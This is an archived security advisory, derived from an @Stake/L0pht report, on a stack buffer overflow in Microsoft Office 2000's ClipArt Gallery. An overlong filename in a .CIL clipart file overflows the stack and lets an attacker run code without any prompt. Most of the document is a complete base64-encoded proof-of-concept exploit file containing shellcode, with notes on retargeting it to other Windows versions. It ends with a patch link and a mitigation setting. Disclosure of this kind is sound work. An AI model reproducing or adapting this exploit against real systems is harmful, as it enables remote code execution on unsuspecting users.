COMMAND
ClipArt Gallery
SYSTEMS AFFECTED
- Microsoft Office 2000
- Microsoft Works 2000
- Microsoft PictureIt 2000
- Microsoft HP 2000
- Microsoft Publisher99
- Microsoft PhotoDraw 2000 Version 1
PROBLEM
Following is based on @Stake Inc. Advisory by L0pht Research Labs.
ClipArt Gallery (CAG.EXE) that comes with Microsoft Office 2000
processes ".CIL" files for installation of clipart from the
Internet. The CIL format is not handled properly by CAG.EXE and
one of the internal fields in the file presents a buffer overflow
condition, allowing arbitrary code to be executed by an attacker.
The attacker would place a malicious CIL file on a website, or in
an email, causing the target to import the CIL file. The file
will be opened without prompting as the CIL file format does not
require confirmation for open after download. This issue requires
NO active scripting to exploit, and is NOT regulated by Internet
Explorer 'security zones'.
The ".CIL" file format is a compressed clip-art delivery format
that takes a Windows Metafile (WMF) or other image, stores it
compressed, and packages it with keywords and descriptive
information. Amongst the various fields in the CIL format are a
few Unicode strings, one of which is the filename to which the
clipart is to be decompressed. If the filename specified is
extremely long, a stack overflow occurs after a Unicode to ANSI
conversion, copying the ANSI version of the buffer over the stack
frame.
Unfortunately, the current fix for this issue is really only a
bandaid to the problem that Internet Explorer is used -for
everything- nowadays and that its HTML parser allows random file
formats to be downloaded and parsed without confirmation in a
number of cases. One can expect to see similar issues to this in
the future.
Exploit? This CIL file will create a harmless registry key when
opened. The registry key location is:
HKLM\Software\Microsoft\Windows:dword,SMACK!=0x00000001
This is proof of concept code only, but theoretically could be any
executable code desired. This code works only on Windows 2000,
but shifting around a few offsets yields code that works under
Windows NT 4.0 and Win9X.
---
Content-Type: application/octet-stream; name="nt5.cil"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="nt5.cil"
Content-MD5: uYb0UakIEO8InYACxmx77A==
UwBQAEwASQBUAEMASQBMADMAAAC0EAAA183GmgAA4v/i//oL+gteAgAAAABPVQEACQAAA08I
AAADADwBAAAAAAUAAAAMAtsL2wsFAAAACwIAAAAABAAAAAUBAQAEAAAABAENAAQAAAAGAQEA
BAAAAAIBAgAFAAAAAQL///8ABAAAAC4BGAAIAAAA+gIAAAAAAAAAAAAABAAAAC0BAAAFAAAA
AQL///8ABwAAAPwCAAAAAAAAAAAEAAAALQEBAAgAAAD6AgAAAQABAAAAAAAEAAAALQECAAQA
AADwAQAAOAEAACQDmgCdAogBagOPAYgDhwG9A6wBtAOSAasDkgGPA3IBYwN+AbkCXQHwAjgB
TgMAAbED0QAXBKgAgASIAOsEcABXBWEAxQVZAOAFWQD/BVkA/wUAAI0FAwAdBQ4ArgQiAEEE
PgDWA2EAbgONAAoDwACqAvoATgI7AfgBgwGnAdEBXAEmAhcBfwLZAN0CowBAA3QApgNMAA8E
LQB7BBUA6gQGAFkF///KBf//4AVUAOAFWQBzBWcABgV+AJwEnAAyBMMAywPxAGgDJwEIA2MB
rQKmAVcC8AEGAhoC4AEYAu8BFgIiAj8CKQIvAzsCMQNfAjkDdwI9AxMDRgOEA08DuQNhA/UD
cwMWBH4DKQSYA2wEsQPHBM8DHQXeA0cF8gNpBQUEiQUeBLYFGwTHBR0E1gUmBOAF4AXgBeAF
vwPTBb8DtwXGA5QF2wOKBeMDcwXsA1wFBARNBR0EPAU3BDAFlgQlBawELQXdBDUF7ARPBfoE
XwUdBWwFQQVwBVEFXgVLBVUFSAVABUQFNwU7BS4FMwUYBS4FCwUeBfsEGwXrBA4FyAT6BLsE
8ASeBMgEdgR/BFYETAQsBCEEKgQDBCEE3gPeA0MD1AMmA8ID5QK5A4kC4ANrAuwDWQIKBHEC
IARlAl4EYAJMBX8CTgWKAkEFkQKDBH8CXgRgAiEEZQJaBKACUAWnAmUFmwJsBX8C4AWHAuAF
/wEqBJUBDgRvARUEWwGzA2QBvwOHAboDjwG0A5IBvQOsAb8DnwHZA6MBGATmAQUE8gH1A+EB
5APWAc0D1gG9A8cBqwPKAZUDwwGEA8YBbwO/AVsDyQGdAogBCAAAAPoCAAAIAAgAAAAAAAQA
AAAtAQAABAAAAPABAgA4AQAAJQOaAJ0CiAFqA48BiAOHAb0DrAG0A5IBqwOSAY8DcgFjA34B
uQJdAfACOAFOAwABsQPRABcEqACABIgA6wRwAFcFYQDFBVkA4AVZAP8FWQD/BQAAjQUDAB0F
DgCuBCIAQQQ+ANYDYQBuA40ACgPAAKoC+gBOAjsB+AGDAacB0QFcASYCFwF/AtkA3QKjAEAD
dACmA0wADwQtAHsEFQDqBAYAWQX//8oF///gBVQA4AVZAHMFZwAGBX4AnAScADIEwwDLA/EA
aAMnAQgDYwGtAqYBVwLwAQYCGgLgARgC7wEWAiICPwIpAi8DOwIxA18COQN3Aj0DEwNGA4QD
TwO5A2ED9QNzAxYEfgMpBJgDbASxA8cEzwMdBd4DRwXyA2kFBQSJBR4EtgUbBMcFHQTWBSYE
4AXgBeAF4AW/A9MFvwO3BcYDlAXbA4oF4wNzBewDXAUEBE0FHQQ8BTcEMAWWBCUFrAQtBd0E
NQXsBE8F+gRfBR0FbAVBBXAFUQVeBUsFVQVIBUAFRAU3BTsFLgUzBRgFLgULBR4F+wQbBesE
DgXIBPoEuwTwBJ4EyAR2BH8EVgRMBCwEIQQqBAMEIQTeA94DQwPUAyYDwgPlArkDiQLgA2sC
7ANZAgoEcQIgBGUCXgRgAkwFfwJOBYoCQQWRAoMEfwJeBGACIQRlAloEoAJQBacCZQWbAmwF
fwLgBYcC4AX/ASoElQEOBG8BFQRbAbMDZAG/A4cBugOPAbQDkgG9A6wBvwOfAdkDowEYBOYB
BQTyAfUD4QHkA9YBzQPWAb0DxwGrA8oBlQPDAYQDxgFvA78BWwPJAZ0CiAEIAAAA+gIAAAEA
AQAAAAAABAAAAC0BAgAEAAAA8AEAAI4AAAAkA0UA/wWJAtEGogLcBscC9AbZAj4H8wI7Bw0D
GAenAwgH4QP3BiIE9wZsBPcGsATwBswE5wbqBNwGDAXOBhEFxAYcBbgGKwWuBi0FpAY0BZ0G
QwWUBkkFigZMBXUGVQV6BisFiAYKBYUG7gSMBsYEjwaTBIUGagR8Bi8EZwYNBGwGAARsBuwD
TAbGA/8FvgP/BeAFaAfgBVoHygVsB5YFlAckBaMHwAS6BxYEuQfeA6YHTgOsB9UCpwezAqMH
qQLHB6sCzAfFAqcHswKsB9UC0Af0AuIH5wLgB6ACnAizAuwIuQLnCKACkQidAtkHdALAB3oC
mgd1AooHXwJ+B1ACWwdBAi8HQgIYBywC7gY8Av8FBAL/BYkCCAAAAPoCAAAIAAgAAAAAAAQA
AAAtAQAABAAAAPABAgCOAAAAJQNFAP8FiQLRBqIC3AbHAvQG2QI+B/MCOwcNAxgHpwMIB+ED
9wYiBPcGbAT3BrAE8AbMBOcG6gTcBgwFzgYRBcQGHAW4BisFrgYtBaQGNAWdBkMFlAZJBYoG
TAV1BlUFegYrBYgGCgWFBu4EjAbGBI8GkwSFBmoEfAYvBGcGDQRsBgAEbAbsA0wGxgP/Bb4D
/wXgBWgH4AVaB8oFbAeWBZQHJAWjB8AEugcWBLkH3gOmB04DrAfVAqcHswKjB6kCxwerAswH
xQKnB7MCrAfVAtAH9ALiB+cC4AegApwIswLsCLkC5wigApEInQLZB3QCwAd6ApoHdQKKB18C
fgdQAlsHQQIvB0ICGAcsAu4GPAL/BQQC/wWJAggAAAD6AgAAAQABAAAAAAAEAAAALQECAAQA
AADwAQAAYAAAACQDLgD/BVkA/wUAAG4GBgDeBhQATQcqALkHSAAjCG4AigicAO0I0QBMCQ4B
pglSAfsJnAFKCuwBkwpBAtUKnAIRC/wCRQtgA3ILxwOXCzEEtAueBMgLDQXVC30F2gv8BY4L
/AWOC+AFiguIBX4LGwVpC7AETAtGBCcL3wP6CnsDxgoaA4sKvgJJCmYCAAoVArIJyAFdCYIB
BAlDAaYICgFECNkA3gewAHYHjgAMB3QAoAZjADIGWgD/BVkACAAAAPoCAAAIAAgAAAAAAAQA
AAAtAQAABAAAAPABAgBgAAAAJQMuAP8FWQD/BQAAbgYGAN4GFABNByoAuQdIACMIbgCKCJwA
7QjRAEwJDgGmCVIB+wmcAUoK7AGTCkEC1QqcAhEL/AJFC2ADcgvHA5cLMQS0C54EyAsNBdUL
fQXaC/wFjgv8BY4L4AWKC4gFfgsbBWkLsARMC0YEJwvfA/oKewPGChoDiwq+AkkKZgIAChUC
sgnIAV0JggEECUMBpggKAUQI2QDeB7AAdgeOAAwHdACgBmMAMgZaAP8FWQAIAAAA+gIAAAEA
AQAAAAAABAAAAC0BAgAEAAAA8AEAAIwAAAAkA0QAbwf8Bf8F/AX/BZQL8QWUC/EF2gsnBtoL
lwbRCwYHwAt0B6cL4AeGC0kIXQuuCCwLEAn0Cm0JtQrFCW8KGAojCmUK0QmsCnkJ7AocCSUL
uwhWC1YIgAvtB6ILgge8CxUHzgulBtcLNQbaC/wFjgv8BY4LHgaGC4wGdwv5Bl8LYwc/C8wH
FwsyCOgKlQixCvQIcwpPCS4KpAnjCfQJkgk+CjwJgQrhCL4KgQj0Ch4IIgvwBzML7wcTC9YH
xgrSB54KyQdsCrUHJQqvBwcKpgfeCYwHnwl+B4wJeQcdCX4HDQl6B/MIfgffCIEHkgiIBycI
hgfdB2sHNQd1B+MGcgehBmgHWAZ3ByIGeQcPBm8H/AUIAAAA+gIAAAgACAAAAAAABAAAAC0B
AAAEAAAA8AECAIwAAAAlA0QAbwf8Bf8F/AX/BZQL8QWUC/EF2gsnBtoLlwbRCwYHwAt0B6cL
4AeGC0kIXQuuCCwLEAn0Cm0JtQrFCW8KGAojCmUK0QmsCnkJ7AocCSULuwhWC1YIgAvtB6IL
gge8CxUHzgulBtcLNQbaC/wFjgv8BY4LHgaGC4wGdwv5Bl8LYwc/C8wHFwsyCOgKlQixCvQI
cwpPCS4KpAnjCfQJkgk+CjwJgQrhCL4KgQj0Ch4IIgvwBzML7wcTC9YHxgrSB54KyQdsCrUH
JQqvBwcKpgfeCYwHnwl+B4wJeQcdCX4HDQl6B/MIfgffCIEHkgiIBycIhgfdB2sHNQd1B+MG
cgehBmgHWAZ3ByIGeQcPBm8H/AUIAAAA+gIAAAEAAQAAAAAABAAAAC0BAgAEAAAA8AEAAIgA
AAAkA0IAKQT8BT4EKwY/BFUGPwSuBk8E1QaUBLUHrgQYCMMEZQjGBIoIwQStCMgEvAjVBNEI
wQTuCLIEIgmpBG0JiQQNCn8Elwp0BNAKawTuCm0EKQtiBFoL8AM0C4sDCQsqA9YKzQKcCnQC
XAohAhUK1AHHCYwBdAlLARwJEQG+CN8AXgizAPkHkACRB3UAJwdiALsGVwBOBlUA/AVUAOAF
///gBQEAOgYLAKoGHQAZBzcAhwdZAPIHhABaCLYAvwjvACAJLwF9CXYB1AnDASYKFwJyCm8C
uArNAvcKLgMvC5QDXwv9A4gLaQSoC9YEwQtGBdELtgXaC/EF2gvxBZQL4AWUC+AF/AUpBPwF
CAAAAPoCAAAIAAgAAAAAAAQAAAAtAQAABAAAAPABAgCIAAAAJQNCACkE/AU+BCsGPwRVBj8E
rgZPBNUGlAS1B64EGAjDBGUIxgSKCMEErQjIBLwI1QTRCMEE7giyBCIJqQRtCYkEDQp/BJcK
dATQCmsE7gptBCkLYgRaC/ADNAuLAwkLKgPWCs0CnAp0AlwKIQIVCtQBxwmMAXQJSwEcCREB
vgjfAF4IswD5B5AAkQd1ACcHYgC7BlcATgZVAPwFVADgBf//4AUBADoGCwCqBh0AGQc3AIcH
WQDyB4QAWgi2AL8I7wAgCS8BfQl2AdQJwwEmChcCcgpvArgKzQL3Ci4DLwuUA18L/QOIC2kE
qAvWBMELRgXRC7YF2gvxBdoL8QWUC+AFlAvgBfwFKQT8BQgAAAD6AgAAAQABAAAAAAAEAAAA
LQECAAQAAADwAQAADgAAACQDBQBVAPwFVADgBSYE4AUpBPwFVQD8BQgAAAD6AgAACAAIAAAA
AAAEAAAALQEAAAQAAADwAQIADgAAACUDBQBVAPwFVADgBSYE4AUpBPwFVQD8BQgAAAD6AgAA
AQABAAAAAAAEAAAALQECAAQAAADwAQAADgAAACQDBQDgBb8D4AWHAv8FiQL/Bb4D4AW/AwgA
AAD6AgAACAAIAAAAAAAEAAAALQEAAAQAAADwAQIADgAAACUDBQDgBb8D4AWHAv8FiQL/Bb4D
4AW/AwgAAAD6AgAAAQABAAAAAAAEAAAALQECAAQAAADwAQAADgAAACQDBQDgBf8B4AVZAP8F
WQD/BQQC4AX/AQgAAAD6AgAACAAIAAAAAAAEAAAALQEAAAQAAADwAQIADgAAACUDBQDgBf8B
4AVZAP8FWQD/BQQC4AX/AQgAAAD6AgAAAQABAAAAAAAEAAAALQECAAQAAADwAQAADgAAACQD
BQBvB/wFaAfgBY4L4AWOC/wFbwf8BQgAAAD6AgAACAAIAAAAAAAEAAAALQEAAAQAAADwAQIA
DgAAACUDBQBvB/wFaAfgBY4L4AWOC/wFbwf8BQMAAAAAAGYAZgBmAGYAZgBmAGYAZgBmAGYA
ZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYA
ZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYA
ZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYA
ZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYA
ZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYA
ZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYASwB+AH0A
ZwBBAEEAQQAtAC0ALQAtAC0AZgBmAJAA6wAWACwAEAB9AGcAKAAQAH0AZwAkABAAfQBnABgA
7wC/AP8AkACQAJAAkADrAAUA6AD5AP8A/wD/AF4AgQDGAOUA/wD/AP8AkACQAJAAVgBYAIEA
6AB8AP8A/wD/AFAA9gAQAEAAZgCBADgAAwADAHUA9gBfAJAAkAD/ADYAWQBWAFcAuAD9AP8A
/wB/APcA0ABQAP8AEQCQAP8ANgBaAJAAMwDJAEkAMwDAAPIArgCQADMAyQACAA8AUQBHAFcA
AwD5AJAAuAD8AP8A/wD/APcA2ABQADMAwABQAFcAUgADAEYABAD/ABAAVgADAEYACAD/ABAA
UAAzAMAAAwBGAAwA9wDYAP8AEACQAKwAsAC5AKsAqAC+AK0AugCjALIAtgC8AK0AsACsALAA
uQCrAKMAqAC2ALEAuwCwAKgArAD/APsA/gD/AP8A/wCsALIAvgC8ALQA3gD/AAMAAwADAGYA
ZgBmAGYAZgBmAAAAZgBmAGYAZgBmAGYAZgAAAGYAZgBmAGYAZgBmAGYAAABmAGYAZgBmAGYA
ZgBmAGYAZgBmAGYAZgAAAAAA
-----
SOLUTION
Vendor provided fix. Get your patch here:
http://cgl.microsoft.com/clipgallerylive/pss/bufovrun.htm
One may wish to go through all of the file type associations and
turn on the 'Confirm Open After Download' checkbox to ensure that
suspect file types are not automatically executed without user
intervention. To do this in Windows 2000, open up a standard
Explorer window (such as My Computer), and go to the Tools menu
and choose "Folder Options". Under the "File Types" tab, go to
the "CIL" file type and click on it. Now press the "Advanced"
button. You will notice that the checkbox "Confirm Open After
Download" is unchecked. Check it, and then click OK.